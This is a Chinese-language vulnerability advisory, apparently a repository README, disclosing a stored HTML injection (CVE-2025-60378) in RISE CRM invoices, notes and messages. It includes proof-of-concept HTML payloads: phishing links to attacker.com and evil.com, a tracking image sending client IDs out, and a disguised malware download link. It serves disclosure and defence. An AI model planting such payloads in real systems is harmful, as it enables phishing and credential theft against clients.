
⚠️ 安全公告
影响发票、消息传递和自动化通信的关键存储型 HTML 注入漏洞
在 RISE Ultimate Project Manager & CRM 中发现了一个关键的存储型 HTML 注入漏洞,该漏洞允许已认证用户将恶意 HTML 注入到发票行项目、客户备注和消息传递模块中。这些注入的内容会持久化存储在数据库中,并自动在面向客户的电子邮件、PDF 和聊天通信中渲染,从而能够发起大规模网络钓鱼攻击、商业电子邮件入侵以及基于电子邮件/PDF 的恶意软件投递。
RISE CRM 未能正确清理和编码多个用户可编辑字段(包括发票、消息和客户备注)中的 HTML 内容。当已认证用户将 HTML 载荷注入这些字段时,内容会在没有充分过滤的情况下存储到数据库中。随后,这些恶意 HTML 会在没有适当转义的情况下自动渲染到面向客户的电子邮件、PDF 附件和消息/聊天模块中。定期发票和自动化消息传递会通过同时向多个收件人分发恶意内容来放大攻击影响。
| 因素 | 影响 | 说明 |
|---|---|---|
| 机密性 | 🔴 高 | 可通过网络钓鱼获取客户凭据和敏感数据 |
| 完整性 | 🔴 高 | 恶意内容可篡改对通信和业务关系的认知 |
具有低权限项目经理访问权限的攻击者创建包含恶意 HTML 的发票:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
该发票通过自动化电子邮件发送给 100+ 客户。所有客户都会收到看似合法的发票,并被引导至钓鱼网站。攻击者同时从多个受害者处获取凭据。
攻击者将恶意 HTML 注入客户消息:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
所有团队成员和客户都会在聊天中收到该消息,点击链接下载恶意软件。
攻击者设置带有恶意软件投递载荷的定期发票。每个月,客户都会自动收到包含嵌入恶意内容的发票,提供持续的攻击向量。
导航至:RISE CRM 仪表板 → 发票/消息 → 新建
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ 注入的 HTML 在电子邮件、PDF 和消息传递中未经转义即可渲染 ✅ 链接可点击并重定向到攻击者网站 ✅ 图片从攻击者控制的服务器加载 ✅ 内容在所有未来的客户通信中持续存在 ✅ 定期分发自动到达多个收件人
| 日期 | 事件 |
|---|---|
| 待定 | 发现漏洞 |
| 待定 | 通知供应商 |
| 待定 | 分配 CVE-2025-60378 |
| 待定 | 发布补丁(v3.9.4) |
| 待定 | 公开披露 |
发现者: Ajansha Shankar
LinkedIn: https://www.linkedin.com/in/ajansha-shankar/
向量: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
评分: 8.1(高)
详细说明:
如有问题或需要更多信息:
⭐ 如果这项研究对您有帮助,请考虑为本仓库加星!
🔔 保持关注: 关注本仓库以获取此研究及未来安全研究的最新动态。
| 属性 | 值 |
|---|
| CVE ID | CVE-2025-60378 |
| 类型 | 存储型 HTML 注入 |
| CWE | CWE-79 |
| 攻击向量 | 网络/远程 |
| 认证 | 需要(低权限) |
| 用户交互 | 无 |
| 严重性 | 高 |
| CVSS v3.1 | 8.1 - 高 |
| 发现者 | Ajansha Shankar |
| 可用性 | 🟡 低 | 对系统可用性的直接影响有限 |